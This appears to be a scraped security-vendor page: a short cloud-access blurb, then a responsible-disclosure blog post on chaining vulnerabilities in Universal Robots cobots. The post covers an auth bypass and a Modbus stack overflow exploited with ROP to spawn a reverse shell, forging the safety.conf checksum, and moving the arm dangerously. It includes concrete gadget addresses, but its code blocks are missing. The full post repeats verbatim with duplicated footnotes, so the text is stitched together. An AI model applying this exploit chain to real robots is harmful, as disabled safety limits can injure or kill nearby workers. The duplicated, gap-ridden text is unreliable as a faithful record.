For cloud-based companies especially, it’s time to start thinking about AuthZ and AuthN from not just the user and app perspective, but from a complete endpoint perspective. What is the device, OS, patch levels, malware controls, etc., combined with the user auth, for any given access to an application and the data within?

The risk from a compromised vendor is significant, but it’s also largely outside of a company’s control. Anyone who’s been in security for a while knows that there are thousands of companies with X, Y, or Z certifications, or positive audit results when they absolutely shouldn’t have passed. It’s really hard to know how safe your data is when it’s sitting with hundreds of cloud vendors.

What you can do is to get better control over what your own people are doing with that same data, and that starts with understanding who’s accessing it, and from what devices.

 

PRESENTATION | August 22, 2017

Heavy Trucks and Electronic Logging Devices: What Could Go Wrong?

Former IOActive researcher, Corey Thuen, provides a security overview presentation of the various vulnerabilities affecting the trucking industry systems, with a focus on ELD vulnerabilities. (presentation PDF – Black Hat 2017)

RESEARCH |

Exploiting Industrial Collaborative Robots

Traditional industrial robots are boring. Typically, they are autonomous or operate with limited guidance and execute repetitive, programmed tasks in manufacturing and production settings.1 They are often used to perform duties that are dangerous or unsuitable for workers; therefore, they operate in isolation from humans and other valuable machinery.

This is not the case with the latest generation collaborative robots (“cobots”) though. They function with co-workers in shared workspaces while respecting safety standards. This generation of robots works hand-in-hand with humans, assisting them, rather than just performing automated, isolated operations. Cobots can learn movements, “see” through HD cameras, or “hear” through microphones to contribute to business success.

UR5 by Universal Robots2
Baxter by Rethink Robotics3

So cobots present a much more interesting attack surface than traditional industrial robots. But are cobots only limited to industrial applications? NO, they can also be integrated into other settings!

 
The Moley Robotic Kitchen (2xUR10 Arms)4
DARPA’s ALIAS Robot (UR3 Arm)5
Last February, Cesar Cerrudo (@cesarcer) and I published a non-technical paper “Hacking Robots Before Skynet” previewing our research on several home, business, and industrial robots from multiple well-known vendors. We discovered nearly 50 critical security issues. Within the cobot sector, we audited leading robots, including Baxter/Sawyer from Rethink Robotics and UR by Universal Robots.
      Baxter/Sawyer: We found authentication issues, insecure transport in their protocols, default deployment problems, susceptibility to physical attacks, and the usage of ROS, a research framework known to be vulnerable to multiple issues. The major problems we reported appear to have been patched by the company in February 2017.
     UR: We found authentication issues in many of the control protocols, susceptibility to physical attacks, memory corruption vulnerabilities, and insecure communication transport. All of the issues remain unpatched in the latest version (3.4.2.65, May 2017).6

In accordance with IOActive’s responsible disclosure policy we contacted the vendors last January, so they have had ample time to address the vulnerabilities and inform their customers. Our goal is to make cobots more secure and prevent vulnerabilities from being exploited by attackers to cause serious harm to industries, employees, and their surroundings. I truly hope this blog entry moves the collaborative industry forward so we can safely enjoy this and future generations of robots.

In this post, I will discuss how an attacker can chain multiple vulnerabilities in a leading cobot (UR3, UR5, UR10 – Universal Robots) to remotely modify safety settings, violating applicable safety laws and, consequently, causing physical harm to the robot’s surroundings by moving it arbitrarily.

This attack serves as an example of how dangerous these systems can be if they are hacked. Manipulating safety limits and disabling emergency buttons could directly threaten human life. Imagine what could happen if an attack targeted an array of 64 cobots as is found in a Chinese industrial corporation.7

The final exploit abuses six vulnerabilities to change safety limits and disable safety planes and emergency buttons/sensors remotely over the network. The cobot arm swings wildly about, wreaking havoc. This video demonstrates the attack: https://www.youtube.com/watch?v=cNVZF7ZhE-8

Q: Can these robots really harm a person?
A: Yes, a study8 by the Control and Robotics Laboratory at the École de technologie supérieure (ÉTS) in Montreal (Canada) clearly shows that even the smaller UR5 model is powerful enough to seriously harm a person. While running at slow speeds, their force is more than sufficient to cause a skull fracture.9Q: Wait…don’t they have safety features that prevent them from harming nearby humans?
A: Yes, but they can be hacked remotely, and I will show you how in the next technical section.Q: Where are these deployed?
A: All over the world, in multiple production environments every day.10Integrators Define All Safety Settings

Universal Robots is the manufacturer of UR robots. The company that installs UR robots in a specific application is the integrator. Only an integrated and installed robot is considered a complete machine. The integrators of UR robots are responsible for ensuring that any significant hazard in the entire robot system is eliminated. This includes, but is not limited to:11

  • Conducting a risk assessment of the entire system. In many countries this is required by law
  • Interfacing other machines and additional safety devices if deemed appropriate by the risk assessment
  • Setting up the appropriate safety settings in the Polyscope software (control panel)
  • Ensuring that the user will not modify any safety measures by using a “safety password.
  • Validating that the entire system is designed and installed correctly

Universal Robots has recognized potentially significant hazards, which must be considered by the integrator, for example:

  • Penetration of skin by sharp edges and sharp points on tools or tool connectors
  • Penetration of skin by sharp edges and sharp points on obstacles near the robot track
  • Bruising due to stroke from the robot
  • Sprain or bone fracture due to strokes between a heavy payload and a hard surface
  • Mistakes due to unauthorized changes to the safety configuration parameters

Some safety-related features are purposely designed for cobot applications. These features are particularly relevant when addressing specific areas in the risk assessment conducted by the integrator, including:

  • Force and power limiting: Used to reduce clamping forces and pressures exerted by the robot in the direction of movement in case of collisions between the robot and operator.
  • Momentum limiting: Used to reduce high-transient energy and impact forces in case of collisions between robot and operator by reducing the speed of the robot.
  • Tool orientation limiting: Used to reduce the risk associated with specific areas and features of the tool and work-piece (e.g., to avoid sharp edges to be pointed towards the operator).
  • Speed limitation: Used to ensure the robot arm operates a low speed.
  • Safety boundaries: Used to restrict the workspace of the robot by forcing it to stay on the correct side of defined virtual planes and not pass through them.

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety scanner13
Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?
Statement from the UR User Guide

Changing Safety Configurations Remotely

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
 

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recv function, because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
      0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
      0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:


At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls.Depending on the quality of gadgets that useint instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.In this binary, I only found one int 0x80 instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure.This structure contains an array of pointers, each of which points to the arguments of the command to be executed.Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00 at runtime with ROP.In pseudocode this call would be (calls a TCP Reverse Shell):
 
 
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets. 

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.

The following gadget (ROP1 0x8220efa) is used to adjust ESP:

 
 
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the at the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the xffxffxffxff at the end of each argument in cmd[].
  2. Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
  3. Prepare registers for EXECVE. As seen before, we needed
    1. EBX=*args[]
    2. EDX = 0
    3. EAX=0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
 
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
 
 
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
 

Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.

 
Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.

Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.
What are we waiting for?
 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/ 
https://www.youtube.com/watch?v=G6_LCwu7dOg
4https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
5 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
6https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
7http://coro.etsmtl.ca/blog/?p=299
8 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
9https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12https://academy.universal-robots.com
13Software_Manual_en_US.pdf – Universal Robots

Safety planes in action12


Safety I/O: When this input safety function is triggered (via emergency buttons, sensors, etc.), a low signal is sent to the inputs and causes the safety system to transition to “reduced” mode.

Safety Scanner 13

Safety settings are effective in preventing many potential incidents. But what could happen if malicious actors targeted these measures in order to threaten human life?

Statement from the UR User Guide

Changing Safety Configurations Remotely

“The safety configuration settings shall only be changed in compliance with the risk assessment conducted by the integrator.14 If any safety parameter is changed the complete robot system shall be considered new, meaning that the overall safety approval process, including risk assessment, shall be updated accordingly.”
 

The exploitation process to remotely change the safety configuration is as follows:

Step 1.    Confirm the remote version by exploiting an authentication issue on the UR Dashboard Server.
Step 2.    Exploit a stack-based buffer overflow in UR Modbus TCP service, and execute commands as root.
Step 3.    Modify the safety.conf file. This file overrides all safety general limits, joints limits, boundaries, and safety I/O values.
Step 4.    Force a collision in the checksum calculation, and upload the new file. We need to fake this number since integrators are likely to write a note with the current checksum value on the hardware, as this is a common best practice.
Step 5.    Restart the robot so the safety configurations are updated by the new file. This should be done silently.
Step 6.    Move the robot in an arbitrary, dangerous manner by exploiting an authentication issue on the UR control service.

By analyzing and reverse engineering the firmware image ursys-CB3.1-3.3.4-310.img, I was able to understand the robot’s entry points and the services that allow other machines on the network to interact with the operating system. For this demo I used the URSim simulator provided by the vendor with the real core binary from the robot image. I was able to create modified versions of this binary to run partially on a standard Linux machine, even though it was clearer to use the simulator for this example exploit.

Different network services are exposed in the URControl core binary, and most of the proprietary protocols do not implement strong authentication mechanisms. For example, any user on the network can issue a command to one of these services and obtain the remote version of the running process (Step 1):


Now that I have verified the remote target is running a vulnerable image, ursys-CB3.1-3.3.4-310 (UR3, UR5 or UR10), I exploit a network service to compromise the robot (Step 2).The UR Modbus TCP service (port 502) does not provide authentication of the source of a command; therefore, an adversary could corrupt the robot in a state that negatively affects the process being controlled. An attacker with IP connectivity to the robot can issue Modbus read/write requests and partially change the state of the robot or send requests to actuators to change the state of the joints being controlled.It was not possible to change any safety settings by sending Modbus write requests; however, a stack-based buffer overflow was found in the UR Modbus TCP receiver (inside the URControl core binary).A stack buffer overflows with the recv function, because it uses a user-controlled buffer size to determine how many bytes from the socket will be copied there. This is a very common issue.

Before proceeding with the exploit, let’s review the exploit mitigations in place. The robot’s Linux kernel is configured to randomize (randomize_va_space=1 => ASLR) the positions of the stack, virtual dynamic shared object page, and shared memory regions. Moreover, this core binary does not allow any of its segments to be both writable and executable due to the “No eXecute” (NX) bit.

While overflowing the destination buffer, we also overflow pointers to the function’s arguments. Before the function returns, these arguments are used in other function calls, so we have to provide these calls with a valid value/structure. Otherwise, we will never reach the end of the function and be able to control the execution flow.

edx+0x2c is dereferenced and used as an argument for the call to 0x82e0c90. The problem appears afterwards when EBX (which is calculated from our previous controlled pointer on EDX) needs to also point to a structure where a file descriptor is obtained and is closed with “close” afterwards.

To choose a static address that might comply with these two requirements, I used the following static region, since all others change due to ASLR.

I wrote some scripts to find a suitable memory address and found 0x83aa1fc to be perfect since it suits both conditions:
      0x83aa1fc+0x2c points to valid memory -> 0x831c00a (“INT32”)
      0x83aa1fc+0x1014 contains 0 (nearly all this region is zeroed)
Now that I have met both conditions, execution can continue to the end of this function, and I get EIP control because the saved register on the stack was overflowed:

At this point, I control most of the registers, so I need to place my shellcode somewhere and redirect the execution flow there. For this, I used returned-oriented programming (ROP), the challenge will be to find enough gadgets to set everything I need for clean and reliable exploitation. Automatic ROP-chain tools did not work well for this binary, so I did it manually.
 
First, I focus on my ultimate goal: to execute a reverse shell that connects to my machine. One key point when building a remote ROP-based exploit in Linux are system calls. Depending on the quality of gadgets that use int instructions I find, I will be able to use primitives such as write or dup2 to reuse the socket that was already created to return a shell or other post-exploitation strategies.

In this binary, I only found one int 0x80 instruction. This is used to invoke system calls in Linux on x86. Because this is a one-shot gadget, I can only perform a single system call: I will use the execve system call to execute a program. This int 0x80 instruction requires setting up a register with the system call number (EAX in this case 0xb) and then set a register (EBX) that points to a special structure. This structure contains an array of pointers, each of which points to the arguments of the command to be executed.
 
Because of how this vulnerability is triggered, I cannot use null bytes (0x00) on the request buffer. This is a problem because we need to send commands and arguments and also create an array of pointers that end with a null byte. To overcome this, I send a placeholder, like chunks of 0xFF bytes, and later on I replace them with 0x00 at runtime with ROP.
 
In pseudocode this call would be (calls a TCP Reverse Shell):
 
 
All the controlled data is in the stack, so first I will try to align the stack pointer (ESP) to my largest controlled section (STAGE 1). I divided the largest controlled sections into two stages, since they both can potentially contain many ROP gadgets. 

As seen before, at this point I control EBX and EIP. Next, I have to align ESP to any of the controlled segments so I can start doing ROP.
The following gadget (ROP1 0x8220efa) is used to adjust ESP:
 
 
This way ESP = ESP + EBX – 1 (STAGE 1 address in the stack). This aligns ESP to my STAGE 1 section. EBX should decrease ESP by 0x137 bytes, so I use the number 0xfffffec9 (4294966985) because when adding it to ESP, it wraps around to the desired value.
When the retn instruction of the gadget is executed, ROP gadgets at STAGE 1 start doing their magic. STAGE 1 of the exploit does the following:
  1. Zero out the at the end of the arguments structure. This way the processor will know that EXECVE arguments are only those three pointers.
  2. Save a pointer to our first command of cmd[] in our arguments structure.
  3. Jump to STAGE 2, because I don’t have much space here.
 

STAGE 2 of the exploit does the following:

  1. Zero out the xffxffxffxff at the end of each argument in cmd[].
  2. Save a pointer to the 2nd and 3rd argument of cmd[] in on our arguments structure.
  3. Prepare registers for EXECVE. As seen before, we needed
    1. EBX=*args[]
    2. EDX = 0
    3. EAX=0xb
  4. Call the int 0x80 gadget and execute the reverse shell.
Once the TCP reverse shell payload is executed, a connection is made back to my computer. Now I can execute commands and use sudo to execute commands as root in the robot controller.
 
Safety settings are saved in the safety.conf file (Step 3). Universal Robots implemented a CRC (STM-32) algorithm to provide integrity to this file and save the calculated checksum on disk. This algorithm does not provide any real integrity to the settings, as it is possible to generate collisions or calculate new checksum values for new settings overriding special files on the filesystem. I reversed how this calculation is being made for each safety setting and created an algorithm that replicates it. On the video demo, I did not fake the new CRC value to remain the same (located on top-right of the screen), even though this is possible and easy (Step 4).
 
Before modifying any safety setting on the robot, I setup a process that automatically starts a new instance of the robot controller after 25 seconds with the new settings. This will give me enough time to download, modify, and upload a new safety setting file. The following command sets up a new URControl process. I used Python since it allows me to close all current file descriptors of the running process when forking. Remember that I am forking from the reverse shell object, so I need to create a new process that does not inherit any of the file descriptors so they are closed when the parent URControl process dies (in order to restart and apply new safety settings).
 
 
Now I have 25 seconds to download the current file, modify it, calculate new CRC, reupload it, and kill the running URControl process (which has an older safety settings config). I can programmatically use the kill command to target the current URControl instance (Step 5).
 

Finally, I send this command to the URControl service in order to load the new installation we uploaded. I also close any popup that might appear on the UI.

 

Finally, an attacker can simply call the movej function in the URControl service to move joints remotely, with a custom speed and acceleration (Step 6). This is shown at the end of the video.

Once again, I see novel and expensive technology which is vulnerable and exploitable. A very technical bug, like a buffer overflow in one of the protocols, exposed the integrity of the entire robot system to remote attacks. We reported the complete flow of vulnerabilities to the vendors back in January, and they have yet to be patched.

What are we waiting for?

 
1 https://www.robots.com/faq/show/what-is-an-industrial-robot
2 https://www.roboticsbusinessreview.com/manufacturing/cobot-market-boom-lifts-universal-robots-fortunes-2016/
3 http://www.rethinkrobotics.com/blog/humans-and-collaborative-robots-working-together-in-grand-rapids-mi/ 
https://www.youtube.com/watch?v=G6_LCwu7dOg
4https://www.wired.com/2016/11/darpa-alias-autonomous-aircraft-aurora-sikorsky/
5 https://www.universal-robots.com/how-tos-and-faqs/faq/ur-faq/release-note-software-version-34xx/
6https://www.youtube.com/watch?v=PtncirKiBXQ&t=1s
7http://coro.etsmtl.ca/blog/?p=299
8 http://www.forensicmed.co.uk/pathology/head-injury/skull-fracture/
9https://www.universal-robots.com/case-stories/
11 https://academy.universal-robots.com
12https://academy.universal-robots.com
13Software_Manual_en_US.pdf – Universal Robots